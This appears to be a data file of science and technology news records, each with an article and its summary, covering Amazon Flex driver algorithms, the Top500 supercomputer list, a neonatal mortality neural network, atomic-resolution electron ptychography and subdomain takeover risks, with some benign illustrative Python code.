Online retailing giant Amazon's Flex contract drivers say their jobs are at the mercy of software that can unfairly rate their performance. Algorithms mine data on performance patterns and assign drivers routes, or deactivate them, with little human feedback. One source says the Flex algorithms do not account for human nature, setting up good drivers for failure. A former engineer who helped design Flex says Amazon believes the program's benefits offset the collateral damage; a former manager says the company knew the software would lead to errors and bad press, but felt addressing such issues was unnecessarily expensive, as long as drivers could easily be replaced.
[]
[]
[]
scitechnews
None
None
None
None
Online retailing giant Amazon's Flex contract drivers say their jobs are at the mercy of software that can unfairly rate their performance. Algorithms mine data on performance patterns and assign drivers routes, or deactivate them, with little human feedback. One source says the Flex algorithms do not account for human nature, setting up good drivers for failure. A former engineer who helped design Flex says Amazon believes the program's benefits offset the collateral damage; a former manager says the company knew the software would lead to errors and bad press, but felt addressing such issues was unnecessarily expensive, as long as drivers could easily be replaced.
179
A New Supercomputer Has Joined the Top Five
The latest update to the list of the world's 500 most powerful supercomputers saw only one new entry in the top 10, confirming that although these devices are still improving their performance, the pace of innovation is slowing down. Perlmutter, a US-based supercomputer located at the Department of Energy's Lawrence Berkeley Laboratory, entered the June edition of the Top500 list in fifth position, bumping Nvidia's Selene device to sixth place. At 64.6 petaflops, Perlmutter is the most notable change to the list; it also fared well in the Green500 list, which focuses on the energy efficiency of supercomputers, claiming the number-six spot thanks to a power efficiency of 25.55 gigaflops per watt. In total, there were only 58 new entries in the Top500 list. This is not far off the record-low of 44 new entrants registered last November, and indicates a slowdown compared to earlier years. In 2007, for example, 300 new devices made it to the ranking. This is mostly blamed on the impact of the COVID-19 crisis, which drove investment in commercial high-performance computing systems to an all-time low. The authors of the list admitted that the latest edition "saw little change," with Japan's Fugaku supercomputer still retaining a strong lead in the number-one spot. Fugaku came online last March and boasts a record-breaking 442 petaflops - meaning that it delivers roughly three times the performance of the nearest competitor, IBM's Summit, which is hosted at the Oak Ridge National Laboratory and claims 148.8 petaflops. A product of a partnership between Riken and Fujitsu, Fugaku uses Fujitsu's custom ARM processor, which has enabled the device to reach peak performance of over an exaflop. "Such an achievement has caused some to introduce this machine as the first 'exascale' supercomputer," said the Top500 authors. Exascale systems can perform a quintillion calculations each second, and are expected to significantly speed up applications ranging from precision medicine to climate simulation. China, the US and the EU have all unveiled aggressive goals to achieve exascale computing systems in the next few years. Japan's Research Organization for Information Science and Technology (RIST) has selected 74 scientific projects for Fugaku to advance, many of which aim to accelerate research to combat the COVID-19 pandemic, such as early detection of disease or high-speed and high-precision drug discovery simulations. Competing behind Fugaku, the rest of the list's top 10 remained largely the same, with IBM's Sierra in third place following the company's Summit supercomputer. China saw a significant drop in the number of devices it can claim on the list. From 212 Chinese machines featuring on the previous iteration, the country now accounts for 186 supercomputers on the Top500 list. "There hasn't been much definitive proof of why this is happening, but it is certainly something to note," said the list's authors. Despite the drop, China still dominates the Top500: the next biggest competitor, the USA, lags behind with 123 systems on the list. This has led some researchers to conclude that the gap between the two countries is rapidly closing. It remains true, however, that the performance of Chinese supercomputers is far outstripped by other systems. The USA has an aggregate performance of 856.8 petaflops, while China's machines total 445.3 petaflops.
In another noteworthy development, the Top500's authors highlighted the marked increase in the use of AMD processors, especially among the few new entries. The company's EPYC processors power half of the 58 new contestants, and three of the devices included in the top 10 - Perlmutter, Selene, and Germany's Juwels Booster Module. Compared to the same time last year, AMD noted that EPYC systems also power five times more supercomputers throughout the entire list. "We are committed to enabling the performance and capabilities needed to advance scientific discoveries, break the exascale barrier, and continue driving innovation," said Forrest Norrod, senior vice president of the data center and embedded systems group at AMD. In terms of system interconnects, the authors observed little change, with Ethernet used in around half of the systems. A third of the supercomputers leveraged InfiniBand, and less than a tenth relied on OmniPath. Custom interconnects accounted for 37 systems.
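As a quick sanity check on the figures above, Green500 efficiency is essentially sustained performance divided by power draw, so Perlmutter's 64.6 petaflops at 25.55 gigaflops per watt implies a draw of roughly 2.5 megawatts. A back-of-the-envelope calculation:

```python
# Back-of-the-envelope check of the figures quoted above: Green500 efficiency
# is essentially sustained performance divided by power draw.
def gflops_per_watt(petaflops: float, megawatts: float) -> float:
    return (petaflops * 1e6) / (megawatts * 1e6)   # GFLOPS / W

# Perlmutter: 64.6 PFLOPS at 25.55 GFLOPS/W implies roughly this power draw:
implied_mw = 64.6 * 1e6 / 25.55 / 1e6   # GFLOPS / (GFLOPS per W) -> W -> MW
print(f"implied draw: ~{implied_mw:.1f} MW")                 # about 2.5 MW
print(f"check: {gflops_per_watt(64.6, implied_mw):.2f} GFLOPS/W")
```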
The Perlmutter supercomputer in the U.S. Department of Energy's Lawrence Berkeley Laboratory is the only new entry in the top 10 of the June edition of the Top500 listing of the world's most powerful supercomputers. With 64.6 petaflops, Perlmutter reached fifth place in the new ranking, pushing the previous fifth-place system, Nvidia's Selene, down to sixth place. Perlmutter also ranked sixth on the Green500 ranking of the most energy efficient supercomputers, with a power efficiency of 25.55 gigaflops per watt. Remaining at the top of the Top500 list were Japan's Fugaku (442 petaflops) and IBM's Summit (148.8 petaflops). China accounts for 186 supercomputers in the latest Top500, followed by the U.S. with 123.
[]
[]
[]
scitechnews
None
None
None
None
The Perlmutter supercomputer in the U.S. Department of Energy's Lawrence Berkeley Laboratory is the only new entry in the top 10 of the June edition of the Top500 listing of the world's most powerful supercomputers. With 64.6 petaflops, Perlmutter reached fifth place in the new ranking, pushing the previous fifth-place system, Nvidia's Selene, down to sixth place. Perlmutter also ranked sixth on the Green500 ranking of the most energy efficient supercomputers, with a power efficiency of 25.55 gigaflops per watt. Remaining at the top of the Top500 list were Japan's Fugaku (442 petaflops) and IBM's Summit (148.8 petaflops). China accounts for 186 supercomputers in the latest Top500, followed by the U.S. with 123. The latest update to the list of the world's 500 most powerful supercomputers saw only one new entry in the top 10, confirming that although these devices are still improving their performance, the pace of innovation is slowing down. Perlmutter, a US-based supercomputer located at the Department of Energy's Lawrence Berkeley Laboratory, entered the June edition of the Top500 list in fifth position, bumping Nvidia's Selene device to sixth place. At 64.6 petaflops, Perlmutter is the most notable change to the list; it also fared well in the Green500 list, which focuses on the energy efficiency of supercomputers, claiming the number-six spot thanks to a power efficiency of 25.55 gigaflops per watt. In total, there were only 58 new entries in the Top500 list. This is not far off the record-low of 44 new entrants registered last November, and indicates a slowdown compared to earlier years. In 2007, for example, 300 new devices made it to the ranking. This is mostly blamed on the impact of the COVID-19 crisis, which drove investment in commercial high-performance computing systems to an all-time low. The authors of the list admitted that the latest edition "saw little change," with Japan's Fugaku supercomputer still retaining a strong lead in the number-one spot. Fugaku came online last March and boasts a record-breaking 442 petaflops - meaning that it delivers roughly three times the performance of the nearest competitor, IBM's Summit, which is hosted at the Oak Ridge National Laboratory and claims 148.8 petaflops. A product of a partnership between Riken and Fujitsu, Fugaku uses Fujitsu's custom ARM processor, which has enabled the device to reach peak performance of over an exaflop. "Such an achievement has caused some to introduce this machine as the first 'exascale' supercomputer," said the Top500 authors. Exascale systems can perform a quintillion calculations each second, and are expected to significantly speed up applications ranging from precision medicine to climate simulation. China, the US and the EU have all unveiled aggressive goals to achieve exascale computing systems in the next few years. Japan's Research Organization for Information Science and Technology (RIST) has selected 74 scientific projects for Fugaku to advance, many of which aim to accelerate research to combat the COVID-19 pandemic, such as early detection of disease or high-speed and high-precision drug discovery simulations. Competing behind Fugaku, the rest of the list's top 10 remained largely the same, with IBM's Sierra in third place following the company's Summit supercomputer. China saw a significant drop in the number of devices it can claim on the list. 
From 212 Chinese machines featuring on the previous iteration, the country now accounts for 186 supercomputers on the Top500 list. "There hasn't been much definitive proof of why this is happening, but it is certainly something to note," said the list's authors. Despite the drop, China still dominates the Top500: the next biggest competitor, the USA, lags behind with 123 systems on the list. This has led some researchers to conclude that the gap between the two countries is rapidly closing. It remains true, however, that the performance of Chinese supercomputers is far outstripped by other systems. The USA has an aggregate performance of 856.8 petaflops, while China's machines total 445.3 petaflops. In another noteworthy development, the Top500's authors highlighted the marked increase in the use of AMD processors, especially among the few new entries. The company's EPYC processors power half of the 58 new contestants, and three of the devices included in the top 10 - Perlmutter, Selene, and Germany's Juwels Booster Module. Compared to the same time last year, AMD noted that EPYC systems also power five times more supercomputers throughout the entire list. "We are committed to enabling the performance and capabilities needed to advance scientific discoveries, break the exascale barrier, and continue driving innovation," said Forrest Norrod, senior vice president of the data center and embedded systems group at AMD. In terms of system interconnects, the authors observed little change, with Ethernet used in around half of the systems. A third of the supercomputers leveraged InfiniBand, and less than a tenth relied on OmniPath. Custom interconnects accounted for 37 systems.
180
AI Breakthrough in Premature Baby Care
As part of her PhD work, JCU engineering lecturer Stephanie Baker led a pilot study that used a hybrid neural network to accurately predict how much risk individual premature babies face. She said complications resulting from premature birth are the leading cause of death in children under five and over 50 per cent of neonatal deaths occur in preterm infants. "Preterm birth rates are increasing almost everywhere. In neonatal intensive care units, assessment of mortality risk assists in making difficult decisions regarding which treatments should be used and if and when treatments are working effectively," said Ms Baker. She said to better guide their care, preterm babies are often given a score that indicates the risk they face. "But there are several limitations of this system. Generating the score requires complex manual measurements, extensive laboratory results, and the listing of maternal characteristics and existing conditions," said Ms Baker. She said the alternative was measuring variables that do not change - such as birthweight - that prevents recalculation of the infant's risk on an ongoing basis and does not show their response to treatment. "An ideal scheme would be one that uses fundamental demographics and routinely measured vital signs to provide continuous assessment. This would allow for assessment of changing risk without placing unreasonable additional burden on healthcare staff," said Ms Baker. She said the JCU team's research, published in the journal Computers in Biology and Medicine , had developed the Neonatal Artificial Intelligence Mortality Score (NAIMS), a hybrid neural network that relies on simple demographics and trends in heart and respiratory rate to determine mortality risk. "Using data generated over a 12 hour period, NAIMS showed strong performance in predicting an infant's risk of mortality within 3, 7, or 14 days. "This is the first work we're aware of that uses only easy-to-record demographics and respiratory rate and heart rate data to produce an accurate prediction of immediate mortality risk," said Ms Baker. She said the technique was fast with no need for invasive procedures or knowledge of medical histories. "Due to the simplicity and high performance of our proposed scheme, NAIMS could easily be continuously and automatically recalculated, enabling analysis of a baby's responsiveness to treatment and other health trends," said Ms Baker. She said NAIMS had proved accurate when tested against hospital mortality records of preterm babies and had the added advantage over existing schemes of being able to perform a risk assessment based on any 12-hours of data during the patient's stay. Ms Baker said the next step in the process was to partner with local hospitals to gather more data and undertake further testing. "Additionally, we aim to conduct research into the prediction of other outcomes in neo-natal intensive care, such as the onset of sepsis and patient length of stay," said Ms Baker.
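As a rough illustration of the idea described above (not the published NAIMS model), the sketch below condenses a 12-hour window of heart-rate and respiratory-rate samples into simple trend features, appends basic demographics, and trains a small classifier on synthetic data. All values, sampling rates, and the classifier choice are assumptions for demonstration only.

```python
# Illustrative sketch only: 12-hour vital-sign trends + demographics -> small classifier.
# This is a stand-in for the idea described above, not the published NAIMS hybrid
# network; all data here is synthetic.
import numpy as np
from sklearn.neural_network import MLPClassifier

rng = np.random.default_rng(1)

def window_features(hr: np.ndarray, rr: np.ndarray) -> np.ndarray:
    """Mean, variability, and linear trend for each vital sign over the window."""
    t = np.arange(hr.size)
    return np.array([
        hr.mean(), hr.std(), np.polyfit(t, hr, 1)[0],
        rr.mean(), rr.std(), np.polyfit(t, rr, 1)[0],
    ])

n = 2000
X, y = [], []
for _ in range(n):
    hr = rng.normal(155, 10, 144)        # ~5-minute samples over 12 hours
    rr = rng.normal(55, 8, 144)
    demo = np.array([rng.normal(1.2, 0.4), rng.normal(29, 3)])  # birthweight (kg), gestational age (weeks)
    X.append(np.concatenate([demo, window_features(hr, rr)]))
    # Synthetic label: higher risk assigned to very low birthweight
    y.append(int(rng.random() < 0.05 + 0.1 * (demo[0] < 1.0)))
X, y = np.array(X), np.array(y)

clf = MLPClassifier(hidden_layer_sizes=(16,), max_iter=2000, random_state=0).fit(X, y)
print("predicted mortality-risk probability:", clf.predict_proba(X[:1])[0, 1])
```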
A hybrid neural network can accurately forecast premature babies' individual mortality risk in order to better guide their care, thanks to scientists at Australia's James Cook University (JCU). JCU's Stephanie Baker said the Neonatal Artificial Intelligence Mortality Score (NAIMS) network assesses preterm infants' mortality risk based on simple demographics and trends in heart and respiratory rate. Baker said NAIMS could predict an infant's mortality risk within three, seven, or 14 days from data generated over 12 hours, without requiring invasive procedures or knowledge of medical histories. Said Baker, "Due to the simplicity and high performance of our proposed scheme, NAIMS could easily be continuously and automatically recalculated, enabling analysis of a baby's responsiveness to treatment and other health trends."
[]
[]
[]
scitechnews
None
None
None
None
A hybrid neural network can accurately forecast premature babies' individual mortality risk in order to better guide their care, thanks to scientists at Australia's James Cook University (JCU). JCU's Stephanie Baker said the Neonatal Artificial Intelligence Mortality Score (NAIMS) network assesses preterm infants' mortality risk based on simple demographics and trends in heart and respiratory rate. Baker said NAIMS could predict an infant's mortality risk within three, seven, or 14 days from data generated over 12 hours, without requiring invasive procedures or knowledge of medical histories. Said Baker, "Due to the simplicity and high performance of our proposed scheme, NAIMS could easily be continuously and automatically recalculated, enabling analysis of a baby's responsiveness to treatment and other health trends." As part of her PhD work, JCU engineering lecturer Stephanie Baker led a pilot study that used a hybrid neural network to accurately predict how much risk individual premature babies face. She said complications resulting from premature birth are the leading cause of death in children under five and over 50 per cent of neonatal deaths occur in preterm infants. "Preterm birth rates are increasing almost everywhere. In neonatal intensive care units, assessment of mortality risk assists in making difficult decisions regarding which treatments should be used and if and when treatments are working effectively," said Ms Baker. She said to better guide their care, preterm babies are often given a score that indicates the risk they face. "But there are several limitations of this system. Generating the score requires complex manual measurements, extensive laboratory results, and the listing of maternal characteristics and existing conditions," said Ms Baker. She said the alternative was measuring variables that do not change - such as birthweight - that prevents recalculation of the infant's risk on an ongoing basis and does not show their response to treatment. "An ideal scheme would be one that uses fundamental demographics and routinely measured vital signs to provide continuous assessment. This would allow for assessment of changing risk without placing unreasonable additional burden on healthcare staff," said Ms Baker. She said the JCU team's research, published in the journal Computers in Biology and Medicine , had developed the Neonatal Artificial Intelligence Mortality Score (NAIMS), a hybrid neural network that relies on simple demographics and trends in heart and respiratory rate to determine mortality risk. "Using data generated over a 12 hour period, NAIMS showed strong performance in predicting an infant's risk of mortality within 3, 7, or 14 days. "This is the first work we're aware of that uses only easy-to-record demographics and respiratory rate and heart rate data to produce an accurate prediction of immediate mortality risk," said Ms Baker. She said the technique was fast with no need for invasive procedures or knowledge of medical histories. "Due to the simplicity and high performance of our proposed scheme, NAIMS could easily be continuously and automatically recalculated, enabling analysis of a baby's responsiveness to treatment and other health trends," said Ms Baker. She said NAIMS had proved accurate when tested against hospital mortality records of preterm babies and had the added advantage over existing schemes of being able to perform a risk assessment based on any 12-hours of data during the patient's stay. 
Ms Baker said the next step in the process was to partner with local hospitals to gather more data and undertake further testing. "Additionally, we aim to conduct research into the prediction of other outcomes in neo-natal intensive care, such as the onset of sepsis and patient length of stay," said Ms Baker.
181
See the Highest-Resolution Atomic Image Ever Captured
Behold the highest-resolution image of atoms ever taken. To create it, Cornell University researchers captured a sample from a crystal in three dimensions and magnified it 100 million times, doubling the resolution that earned the same scientists a Guinness World Record in 2018. Their imaging process could help develop materials for designing more powerful and efficient phones, computers and other electronics, as well as longer-lasting batteries. The scientists obtained the image using a technique called electron ptychography. It involves shooting a beam of electrons, about a billion per second, at a target material. The beam moves infinitesimally as the electrons are fired, so they hit the sample from slightly different angles - sometimes they pass through cleanly; other times they collide with atoms and bounce around inside the sample before exiting. Cornell physicist David Muller likens the technique to playing dodgeball against opponents who are standing in the dark. The dodgeballs are electrons, and their targets are individual atoms. Although Muller cannot see the targets, he can detect where the "dodgeballs" end up. Based on the speckle pattern generated by billions of these electrons as they hit a detector, machine-learning algorithms can calculate where the atoms were in the sample and what their shapes might be, thus creating an image. Previously, electron ptychography had only been used to image extremely flat samples just one to a few atoms thick. But Muller and his colleagues' new study in Science describes capturing multiple layers tens to hundreds of atoms thick. This makes the technique much more relevant to materials scientists, who typically study the properties of samples with a thickness of about 30 to 50 nanometers. (This is smaller than the length your fingernails grow in a minute but many times thicker than what electron ptychography could image in the past.) "They can actually look at stacks of atoms now, so it's amazing," says University of Sheffield engineer Andrew Maiden, who helped to develop ptychography but was not part of the new study. "The resolution is just staggering." This result marks an important advancement in the world of electron microscopy . Invented in the early 1930s, standard electron microscopes made it possible to see objects such as polioviruses, which are smaller than the wavelengths of visible light. But electron microscopes had a limit: increasing their resolution required raising the electron beam's energy, and eventually the necessary energy would become so great that it would damage the sample. Ptychography, in contrast, uses a detector that can record all the different angles the beam can scatter to at every beam position, getting much more information with the same wavelength and lens. Researchers theorized ptychography in the 1960s and conceived its use to overcome electron lenses' limits in the 1980s. But because of computing and detector limitations and the complex math required, the technique was not put into practice for decades. Early versions worked far better with visible light and x-rays than the electrons needed to image atomic-size objects. Meanwhile scientists kept improving electron microscopes. "You had to be a true believer in ptychography to be paying attention to it," Muller says. Just in the past several years Muller and his team developed a detector good enough for electron ptychography to work experimentally. 
By 2018 they had figured out how to reconstruct two-dimensional samples with the technique, producing what Muller calls "the highest-resolution image by any method in the world" (and winning that Guinness record). The researchers accomplished this feat using a lower-energy wavelength than other methods, letting them better preserve what they viewed. The next challenge was thicker samples, in which an electron wave ricochets off many atoms before reaching a detector: the so-called multiple scattering problem. The team members found that with enough overlapping speckle patterns and computing power (and, according to Muller, "brute force and ignorance"), they could work backward to determine which layout of atoms produced a given pattern. To do this, they fine-tuned a model until the pattern it generated matched the experimentally produced one. Such high-resolution imaging techniques are essential for developing the next generation of electronic devices. For example, many researchers are looking beyond silicon-based computer chips to find more efficient semiconductors. To make this happen, engineers need to know what they are working with at an atomic level - which means using technologies such as electron ptychography. "We have these tools sitting there, waiting to help us optimize what will become the next generation of devices," says J. Murray Gibson, dean of the Florida A&M University-Florida State University College of Engineering, who was not part of the new study. Batteries are a particularly promising area for applying imaging techniques such as electron ptychography, says Roger Falcone, a physicist at the University of California, Berkeley, who was also not involved with the research. Making batteries that can store a lot of energy safely is critical for the transition from fossil fuels to renewable energies, including wind and solar. "Imaging technologies are very important to improving batteries because we can look at the chemical reactions in detail," Falcone says. But there is still a long way to go. For electron ptychography to lead to breakthroughs for your cell phone or laptop, it must do more than reconstruct an image - it must precisely locate an individual atom in a material. Although the scientists showed how their new process could do so in theory, they have not yet demonstrated it experimentally. "With any new technique, it always takes a bit of time for your fellow researchers to try this out and see if it bears out into real, practical uses," says Leslie Thompson, a materials characterization expert at IBM, who was not involved in the new study. "To the extent that you invent a new tool like a high-resolution microscope, my sense is you tend to be surprised [by] what problem it's applied to solve," Falcone says. "People will look at things we can't even imagine now - and solve a problem that we're not even sure we have yet."
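To give a flavour of the "adjust the model until its patterns match the measurements" loop described above, here is a toy single-slice ptychographic reconstruction in the style of the classic ePIE update, run against data it simulates itself. The Cornell work uses a far more sophisticated multislice electron-ptychography reconstruction for thick samples; none of the parameters below come from the study.

```python
# Toy single-slice ptychography (ePIE-style update) on simulated data, meant only
# to illustrate the iterative "match the diffraction patterns" idea described above.
import numpy as np

rng = np.random.default_rng(0)
N, P = 64, 16                      # object size, probe (beam) patch size

# Ground-truth complex object and a simple circular probe
obj_true = np.exp(1j * 0.5 * rng.random((N, N)))
yy, xx = np.mgrid[:P, :P]
probe = ((xx - P / 2) ** 2 + (yy - P / 2) ** 2 < (P / 3) ** 2).astype(complex)

# Overlapping scan positions and simulated diffraction amplitudes |FFT(probe * patch)|
positions = [(r, c) for r in range(0, N - P, 4) for c in range(0, N - P, 4)]
measured = [np.abs(np.fft.fft2(probe * obj_true[r:r + P, c:c + P])) for r, c in positions]

# Reconstruct the object from the amplitudes alone
obj = np.ones((N, N), dtype=complex)
alpha = 0.9
for _ in range(50):
    for (r, c), amp in zip(positions, measured):
        patch = obj[r:r + P, c:c + P]
        exit_wave = probe * patch
        psi = np.fft.fft2(exit_wave)
        psi = amp * np.exp(1j * np.angle(psi))          # enforce measured amplitudes
        exit_new = np.fft.ifft2(psi)
        update = np.conj(probe) * (exit_new - exit_wave) / (np.abs(probe).max() ** 2 + 1e-12)
        obj[r:r + P, c:c + P] = patch + alpha * update

err = np.mean(np.abs(np.abs(obj[8:-8, 8:-8]) - np.abs(obj_true[8:-8, 8:-8])))
print("mean amplitude error in the well-covered region:", round(float(err), 3))
```

The amplitude-replacement step is the "match the measurement" constraint: phases are unknown at the detector, so the loop keeps the current phase estimate while forcing the magnitudes to agree with the recorded pattern, and the overlap between scan positions is what makes the solution converge.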
The highest-resolution atomic image to date was captured by Cornell University researchers from a crystal sample, magnified at a factor of 100 million. The researchers recorded the image via electron ptychography, in which about 1 billion electrons per second are beamed at a target material, with infinitesimal beam movement ensuring the sample is struck from slightly different angles each time. Machine learning algorithms use the resulting speckle pattern to calculate the atoms' locations and possible shapes. The method extends electron ptychography's scope from extremely flat samples to multiple layers tens to hundreds of atoms thick.
[]
[]
[]
scitechnews
None
None
None
None
The highest-resolution atomic image to date was captured by Cornell University researchers from a crystal sample, magnified at a factor of 100 million. The researchers recorded the image via electron ptychography, in which about 1 billion electrons per second are beamed at a target material, with infinitesimal beam movement ensuring the sample is struck from slightly different angles each time. Machine learning algorithms use the resulting speckle pattern to calculate the atoms' locations and possible shapes. The method extends electron ptychography's scope from extremely flat samples to multiple layers tens to hundreds of atoms thick. Behold the highest-resolution image of atoms ever taken. To create it, Cornell University researchers captured a sample from a crystal in three dimensions and magnified it 100 million times, doubling the resolution that earned the same scientists a Guinness World Record in 2018. Their imaging process could help develop materials for designing more powerful and efficient phones, computers and other electronics, as well as longer-lasting batteries. The scientists obtained the image using a technique called electron ptychography. It involves shooting a beam of electrons, about a billion per second, at a target material. The beam moves infinitesimally as the electrons are fired, so they hit the sample from slightly different angles - sometimes they pass through cleanly; other times they collide with atoms and bounce around inside the sample before exiting. Cornell physicist David Muller likens the technique to playing dodgeball against opponents who are standing in the dark. The dodgeballs are electrons, and their targets are individual atoms. Although Muller cannot see the targets, he can detect where the "dodgeballs" end up. Based on the speckle pattern generated by billions of these electrons as they hit a detector, machine-learning algorithms can calculate where the atoms were in the sample and what their shapes might be, thus creating an image. Previously, electron ptychography had only been used to image extremely flat samples just one to a few atoms thick. But Muller and his colleagues' new study in Science describes capturing multiple layers tens to hundreds of atoms thick. This makes the technique much more relevant to materials scientists, who typically study the properties of samples with a thickness of about 30 to 50 nanometers. (This is smaller than the length your fingernails grow in a minute but many times thicker than what electron ptychography could image in the past.) "They can actually look at stacks of atoms now, so it's amazing," says University of Sheffield engineer Andrew Maiden, who helped to develop ptychography but was not part of the new study. "The resolution is just staggering." This result marks an important advancement in the world of electron microscopy . Invented in the early 1930s, standard electron microscopes made it possible to see objects such as polioviruses, which are smaller than the wavelengths of visible light. But electron microscopes had a limit: increasing their resolution required raising the electron beam's energy, and eventually the necessary energy would become so great that it would damage the sample. Ptychography, in contrast, uses a detector that can record all the different angles the beam can scatter to at every beam position, getting much more information with the same wavelength and lens. Researchers theorized ptychography in the 1960s and conceived its use to overcome electron lenses' limits in the 1980s. 
But because of computing and detector limitations and the complex math required, the technique was not put into practice for decades. Early versions worked far better with visible light and x-rays than the electrons needed to image atomic-size objects. Meanwhile scientists kept improving electron microscopes. "You had to be a true believer in ptychography to be paying attention to it," Muller says. Just in the past several years Muller and his team developed a detector good enough for electron ptychography to work experimentally. By 2018 they had figured out how to reconstruct two-dimensional samples with the technique, producing what Muller calls "the highest-resolution image by any method in the world" (and winning that Guinness record). The researchers accomplished this feat using a lower-energy wavelength than other methods, letting them better preserve what they viewed. The next challenge was thicker samples, in which an electron wave ricochets off many atoms before reaching a detector: the so-called multiple scattering problem. The team members found that with enough overlapping speckle patterns and computing power (and, according to Muller, "brute force and ignorance"), they could work backward to determine which layout of atoms produced a given pattern. To do this, they fine-tuned a model until the pattern it generated matched the experimentally produced one. Such high-resolution imaging techniques are essential for developing the next generation of electronic devices. For example, many researchers are looking beyond silicon-based computer chips to find more efficient semiconductors. To make this happen, engineers need to know what they are working with at an atomic level - which means using technologies such as electron ptychography. "We have these tools sitting there, waiting to help us optimize what will become the next generation of devices," says J. Murray Gibson, dean of the Florida A&M University-Florida State University College of Engineering, who was not part of the new study. Batteries are a particularly promising area for applying imaging techniques such as electron ptychography, says Roger Falcone, a physicist at the University of California, Berkeley, who was also not involved with the research. Making batteries that can store a lot of energy safely is critical for the transition from fossil fuels to renewable energies, including wind and solar. "Imaging technologies are very important to improving batteries because we can look at the chemical reactions in detail," Falcone says. But there is still a long way to go. For electron ptychography to lead to breakthroughs for your cell phone or laptop, it must do more than reconstruct an image - it must precisely locate an individual atom in a material. Although the scientists showed how their new process could do so in theory, they have not yet demonstrated it experimentally. "With any new technique, it always takes a bit of time for your fellow researchers to try this out and see if it bears out into real, practical uses," says Leslie Thompson, a materials characterization expert at IBM, who was not involved in the new study. "To the extent that you invent a new tool like a high-resolution microscope, my sense is you tend to be surprised [by] what problem it's applied to solve," Falcone says. "People will look at things we can't even imagine now - and solve a problem that we're not even sure we have yet."
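For readers who want a concrete sense of the "work backward" reconstruction step described above, the sketch below is a minimal, single-slice, PIE-style update loop in Python/NumPy. It is not the Cornell group's multislice electron-ptychography code: the known probe, the scan positions, the measured diffraction amplitudes, and the update step size are all assumptions for illustration, and real reconstructions of thick samples model scattering through many atomic layers and typically rely on gradient-based optimization.

import numpy as np

def ptycho_reconstruct(measured_amps, probe, positions, obj_shape, n_iter=50, step=0.9):
    """Toy single-slice ptychographic reconstruction (PIE-style sketch).

    measured_amps : list of 2-D arrays of measured diffraction amplitudes
                    (square roots of detector intensities), one per scan position
    probe         : 2-D complex array, the assumed-known illumination
    positions     : list of (row, col) top-left corners of each probe placement
    obj_shape     : (rows, cols) of the object transmission function to recover
    """
    obj = np.ones(obj_shape, dtype=complex)      # featureless initial guess
    pr, pc = probe.shape
    for _ in range(n_iter):
        for (r, c), amp in zip(positions, measured_amps):
            patch = obj[r:r + pr, c:c + pc]
            exit_wave = patch * probe            # forward model: object patch times probe
            far_field = np.fft.fft2(exit_wave)   # propagate to the detector plane
            # enforce the measured amplitude while keeping the current phase estimate
            corrected = amp * np.exp(1j * np.angle(far_field))
            new_exit = np.fft.ifft2(corrected)
            # push the correction back into the object estimate
            denom = np.abs(probe).max() ** 2 + 1e-12
            obj[r:r + pr, c:c + pc] = patch + step * np.conj(probe) * (new_exit - exit_wave) / denom
    return obj

The overlap between neighbouring probe positions is what makes this inversion well posed, which is why the article stresses having enough overlapping speckle patterns.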
182
Danger Caused by Subdomains
The internet is full of dangers: Sensitive data can be leaked, malicious websites can allow hackers to access private computers. The Security & Privacy Research Unit at TU Wien in collaboration with Ca' Foscari University has now uncovered an important new security vulnerability that has been overlooked so far. Large websites often have many subdomains - for example, "sub.example.com" could be a subdomain of the website "example.com." With certain tricks, it is possible to take control of such subdomains. And if that happens, new security holes open up that also put people at risk who simply want to use the actual website (in this example: example.com). The research team studied these vulnerabilities and also analysed how widespread the problem is: 50,000 of the world's most important websites were examined, and 1,520 vulnerable subdomains were discovered. The team was invited to the 30th USENIX Security Symposium, one of the most prestigious scientific conferences in the field of cybersecurity. The results have now been published online. "At first glance, the problem doesn't seem that bad," says Marco Squarcina from the Institute of Logic and Computation at TU Vienna. "After all, you might think that you can only gain access to a subdomain if you're explicitly allowed by the administrator of the website, but that's a mistake." This is because often a subdomain points to another website that is physically stored on completely different servers. Maybe you own the website example.com and want to add a blog. You don't want to build it from scratch, but instead use an existing blogging service of another website. Therefore, a subdomain, such as blog.example.com, is connected to another site. "If you use the example.com page and click on the blog there, you won't notice anything suspicious," says Marco Squarcina. "The address bar of the browser shows the correct subdomain blog.example.com, but the data now comes from a completely different server." But what happens if one day this link is no longer valid? Perhaps the blog is not needed anymore or it is relaunched elsewhere. Then the link from blog.example.com points to an external page that is no longer there. In this case, one speaks of "dangling records" - loose ends in the website's network that are ideal points of attack. "If such dangling records are not promptly removed, attackers can set up their own page there, which will then show up at sub.example.com," says Mauro Tempesta (also TU Wien). This is a problem because websites apply different security rules to different areas of the internet. Their own subdomains are typically considered "safe," even if they are in fact controlled from outside. For example, cookies placed on users by the main website can be overwritten and potentially accessed from any subdomains: in the worst case, an intruder can then impersonate another user and carry out illicit actions on their behalf. The team, composed of Marco Squarcina, Mauro Tempesta, Lorenzo Veronese, Matteo Maffei (TU Wien), and Stefano Calzavara (Ca' Foscari), investigated how common this problem is: "We examined 50,000 of the most visited sites in the world, discovering 26 million subdomains," says Marco Squarcina. "On 887 of these sites we found vulnerabilities, on a total of 1,520 vulnerable subdomains." Among the vulnerable sites were some of the most famous websites of all, such as cnn.com or harvard.edu. University sites are more likely to be affected because they usually have a particularly large number of subdomains.
"We contacted all the people responsible for the vulnerable sites. Nevertheless, 6 months later, the problem was still only fixed on 15% of these subdomains," says Marco Squarcina. "In principle, it would not be difficult to fix these vulnerabilities. We hope that with our work we can create more awareness about this security threat." Further information and the original paper: canitakeyoursubdomain.name. Contact: Prof. Matteo Maffei, Institute for Logic and Computation, TU Wien, Favoritenstraße 9-11, 1040 Vienna, +43 1 58801 184860, matteo.maffei @ tuwien.ac.at; Dott. Marco Squarcina, Institute for Logic and Computation, TU Wien, Favoritenstraße 9-11, 1040 Vienna, +43 1 58801 192607, marco.squarcina @ tuwien.ac.at
A security vulnerability could enable hackers to commandeer Website subdomains and inflict severe damage, according to researchers at Austria's Technical University of Wien (TU Wien) and Italy's Ca' Foscari University. The vulnerability lies in the persistence of dangling records - links to subdomains no longer in use - where TU Wien's Mauro Tempesta said attackers can establish their own domains. Such exploits can create vulnerabilities that pose risks to anyone who wants to use the actual site. The researchers found 1,520 vulnerable subdomains within 50,000 of the world's most critical Websites, and university sites were more likely to be vulnerable, since they have an especially large number of subdomains. TU Wien's Marco Squarcina said only 15% of those vulnerabilities have been corrected six months after administrators were warned of the threat.
[]
[]
[]
scitechnews
None
None
None
None
